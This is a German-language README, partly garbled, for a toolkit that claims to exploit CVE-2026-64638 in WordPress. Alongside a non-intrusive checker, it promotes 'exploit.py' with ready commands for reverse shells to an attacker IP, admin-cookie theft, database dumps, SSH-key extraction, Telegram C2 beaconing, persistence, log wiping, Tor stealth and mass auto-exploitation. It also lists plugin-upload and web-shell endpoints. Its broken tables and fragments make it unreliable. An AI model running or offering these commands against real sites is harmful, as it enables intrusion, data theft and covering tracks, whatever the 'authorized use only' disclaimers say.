
🛡️ CVE-2026-64638 - WordPress Security Assessment Suite (CVSS 8.9) | WordPress 4.7.0-7.0.2 pentest toolkit. Includes vulnerability assessment & advanced analysis modules. 🐍 Safe Check & Exploit, 2 mode. Advanced Blue&Red Team Best 2026-64638 Toolkit, Authorized use only. Stay Legal <3zd

⚠️ NUR FÜR ETHISCHEN GEBRAUCH – AUTORISIERTE SICHERHEITSTESTS
Dieses Repository stellt Werkzeuge ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit.
Unbefugter Zugriff auf Computersysteme ist nach CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit illegal.
CVE‑2026‑64638 ist eine kritische, nicht authentifizierte, reflektierte XSS-Schwachstelle in WordPress-Kernversionen 4.7.0 bis 7.0.2, die es einem Angreifer ermöglicht, einen XSS-Angriff über die Application-Passwort-Funktion zu vollständiger Remote-Codeausführung (RCE) auszuweiten.
strip_tags()-Funktion von PHP und wp_kses_post() von WordPress parsen HTML-Tags unterschiedlich, sodass schädliche Eingaben die Bereinigung passieren können.wp-login.php). Bei einem fehlgeschlagenen Login wird der Payload zurückgespiegelt und im Browser des Opfers ausgeführt.| Werkzeug | Zweck | Zielgruppe |
|---|---|---|
exploit.py | Vollständiges Exploitation-Toolkit mit Reverse Shell, Persistenz, C2, Privilegienausweitung, Memory-Forensik, Datenbank-Dump, SSH-Schlüsselextraktion und Massen-Scan. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Endpunkt | Zweck |
|---|---|
/wp-login.php | Login-Seite – XSS-Injektionspunkt |
/wp-admin/authorize-application.php |
Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.
| Red Teams / autorisierte Pentester |
safecheck.py | Nicht-intrusiver Schwachstellenprüfer, der XSS-Reflexion erkennt und die Sicherheitslage bewertet, ohne schädliche Payloads auszuführen. Erstellt detaillierte Berichte. | Blue Teams / Sicherheitsauditoren |
| Funktion | exploit.py | safecheck.py |
|---|
| Schwachstellenerkennung | ✅ | ✅ |
| WordPress-Versionserkennung | ✅ | ✅ |
| Erkennung von XSS-Reflexion | ✅ | ✅ |
| Erfassen von Application-Passwörtern | ✅ | ❌ |
| Plugin-Upload (RCE) | ✅ | ❌ |
| Reverse Shell | ✅ | ❌ |
| C2-Beaconing (HTTP/DNS/Telegram) | ✅ | ❌ |
| Privilegienausweitung | ✅ | ❌ |
| Memory-Forensik | ✅ | ❌ |
| Datenbank-Dump | ✅ | ❌ |
| SSH-Schlüsselextraktion | ✅ | ❌ |
| Persistenzmethoden | ✅ | ❌ |
| Security-Header-Prüfung | ❌ | ✅ |
| Prüfung auf offengelegte Konfigurationsdateien | ❌ | ✅ |
| Prüfung auf Verzeichnislisting | ❌ | ✅ |
| Prüfung auf offengelegte phpinfo | ❌ | ✅ |
| Massen-Scan | ✅ | ✅ |
| Proxy-Unterstützung | ✅ | ✅ |
| Tor-Unterstützung | ✅ | ✅ |
| Ngrok-Tunnel | ✅ | ❌ |
| Interaktive Shell | ✅ | ❌ |
| Nicht-intrusiver (sicherer) Modus | ❌ | ✅ |
| JSON-/Berichtsausgabe | ✅ | ✅ |
| Szenario | Empfohlenes Werkzeug |
|---|
| Blue Team – Überprüfung, ob Ihre WordPress-Installation verwundbar ist | safecheck.py |
| Sicherheitsaudit – nicht-intrusive Schwachstellenbewertung | safecheck.py |
| Red Team – autorisierter Penetrationstest mit vollständiger Exploitation | exploit.py |
| Bug Bounty – Test im Rahmen verantwortungsvoller Offenlegung | safecheck.py |
| Massen-Scan – Überprüfung mehrerer Ziele auf Schwachstellen | exploit.py oder safecheck.py |
| Incident Response – Prüfung, ob Systeme kompromittiert sind | safecheck.py |
| Erweiterte Post-Exploitation – Persistenz, C2, Forensik | exploit.py |
| Parameter | Beschreibung |
|---|
-t, --target | Ziel-WordPress-URL (z. B. https://wordpress-site.com) |
-l, --list | Datei mit einer Liste von Zielen (eine pro Zeile) für den Massen-Scan |
--lhost | Lokale IP-Adresse für Reverse-Shell-Callbacks |
--lport | Lokaler Port für die Reverse Shell (Standard: 4444) |
--proxy | HTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080) |
--timeout | Anfrage-Timeout in Sekunden (Standard: 10) |
--retry | Anzahl der Wiederholungsversuche (Standard: 3) |
--threads | Anzahl der Threads für den Massen-Scan (Standard: 5) |
--exploit | Verwundbare Ziele während des Massen-Scans automatisch ausnutzen |
--ngrok-token | Ngrok-Authtoken für externes Tunneling |
--payload-type | XSS-Payload-Typ: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Session-Hijacking aktivieren (Admin-Cookies stehlen) |
--dump-db | WordPress-Datenbank auslesen (erfordert pymysql) |
--extract-ssh | SSH-Schlüssel aus dem Zielsystem extrahieren |
--tor | Datenverkehr über Tor leiten (socks5h://127.0.0.1:9050) |
--stealth | Stealth-Modus aktivieren (Header spoofen, Anfragen verzögern) |
--no-cleanup | Log-Bereinigung nach der Exploitation überspringen |
--ssl-verify | SSL-Zertifikate verifizieren |
--c2-type | C2-Typ: http, dns, telegram |
--c2-server | C2-Server-URL oder Telegram-Bot-Token |
--auto-priv-esc | Automatische Privilegienausweitung nach der Shell |
--memory-forensics | Memory-Forensik-Modul aktivieren |
-v, --verbose | Ausführliche Ausgabe |
-q, --quiet | Quiet-Modus (minimale Ausgabe) |
| Parameter | Beschreibung |
|---|
-t, --target | Ziel-WordPress-URL (z. B. https://wordpress-site.com) |
-l, --list | Datei mit einer Liste von Zielen (eine pro Zeile) für den Massen-Scan |
--timeout | Anfrage-Timeout in Sekunden (Standard: 10) |
--retry | Anzahl der Wiederholungsversuche (Standard: 3) |
--threads | Anzahl der Threads für den Massen-Scan (Standard: 5) |
--proxy | HTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080) |
--tor | Datenverkehr über Tor leiten (socks5h://127.0.0.1:9050) |
--ssl-verify | SSL-Zertifikate verifizieren |
--output | JSON-Berichtsdatei ausgeben |
-v, --verbose | Ausführliche Ausgabe |
-q, --quiet | Quiet-Modus (minimale Ausgabe) |
| # | Szenario | Befehl |
|---|
| 1 | Schneller Schwachstellencheck | python safecheck.py -t https://wordpress-site.com |
| 2 | Detaillierter Scan mit Bericht | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Vollständige Exploitation mit Reverse Shell | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Benutzerdefiniertes XSS-Payload verwenden | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Session-Hijacking (Admin-Cookies stehlen) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | WordPress-Datenbank auslesen | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | SSH-Schlüssel extrahieren | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Tor für Anonymität verwenden | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | C2-Beaconing mit Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Massen-Scan aus Datei | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Memory-Forensik nach der Shell | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Automatische Privilegienausweitung | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Interaktive Shell | python exploit.py -t https://wordpress-site.com -i |
| 14 | Ngrok-Tunnel | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Befehl | Beschreibung |
|---|
reverse | Reverse-Shell-Listener starten |
persist | Persistenzmethoden anwenden (cron, systemd, rc.local, SSH, WP) |
clean | System-Logs und Verlauf bereinigen |
dumpdb | WordPress-Datenbank auslesen |
ssh | SSH-Schlüssel extrahieren |
priv | Automatische Privilegienausweitung |
mem | Memory-Forensik ausführen |
c2 | C2-Status anzeigen |
c2task | Nach C2-Aufgaben suchen |
exit | Interaktive Shell beenden |
| Erzeugung von Application-Passwörtern |
/wp-admin/update.php?action=upload-plugin | Plugin-Upload (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Webshell-Ausführung |
| Land | Einschlägiges Gesetz |
|---|
| Vereinigte Staaten | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Vereinigtes Königreich | Computer Misuse Act 1990 |
| Türkei | TCK 243 (Unbefugter Zugriff), TCK 244 (Systembeeinträchtigung) |
| Deutschland | StGB § 202a (Datenspionage), § 202b (Abfangen von Daten) |
| Frankreich | Loi Godfrain – Artikel 323-1 |
| Australien | Cybercrime Act 2001 |
| Kanada | Criminal Code – Abschnitt 342.1 |
| Indien | Information Technology Act 2000 – Abschnitt 43, 66 |
| Japan | Act on Prohibition of Unauthorized Computer Access |